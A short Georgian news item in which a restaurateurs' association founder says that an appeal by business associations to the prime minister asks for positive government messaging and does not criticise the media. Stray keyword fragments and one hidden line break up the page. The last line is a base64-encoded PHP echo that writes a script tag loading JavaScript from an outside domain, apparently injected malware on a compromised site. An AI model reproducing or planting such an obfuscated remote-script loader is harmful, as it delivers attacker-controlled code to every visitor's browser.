celsiusi
ავერსი საქკაბელი
რესტორატორთა ასოციაციის დამფუძნებლის შოთა ბურჯანაძის განმარტებით, ეკონომიკას არა მარტო ფული, არამედ განწყობებიც  ამუშავებს და მათ მიერ დღეს გავრცელებული მიმართვის მე-6  პუნქტიც სწორედ ამას გულისხმობს და არა მედიის კრიტიკას.
 
“ეკონომიკას არა მარტო ფული, არამედ განწყობებიც ამუშავებს. ჩვენს მიერ დღეს გავრცელებული მიმართვის მეექვსე პუნქტიც ამას გულისხმობს, რომ მთავრობის მხრიდან თუ იქნება ცოტა მეტი პოზიტიური გზავნილებით საზოგადოება ინფორმირებული, განწყობა სხვა იქნება და, ეკონომიკაც სხვაგვარად ამუშავდება. ეს იგულისხმება მეექვსე პუნქტში და არა მედიის კრიტიკა. პრესკომფერენცია მე დღეს მედიასაშუალებების მადლობით დავიწყე ასე,  რომ ეს მათი კრიტიკა არაა”, - განაცხადა ბურჯანაძემ.
 
შეგახსენებთ, რომ დღეს 15 მდე ბიზნესასოციაციამ ერთობლივი პრესკომფერენცია გამართა და პრემიერს მიმართა, მიმართვის ერთერთ პინქტში წერია, რომ “ქვეყნის ეკონომიკის წინსვლა წარმოუდგენელია დადებითი მესიჯების და პოზიტიური განწყობის გარეშე. მედიასაშუალებები, ისევე როგორც მთავრობა, დაკავებულია მხოლოდ უარყოფითი მესიჯების გაჟღერებით: ეპიდ-სიტუაციაზე, ეკონომიკის არასახარბიელო მდგომარეობაზე, პოლიტიკურ კონიუნქტურაზე, ლარის კურსზე, მკვლელობებზე და ა.შ.”,- ნათქვამია მიმართვაში.
 
 
 
1310
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");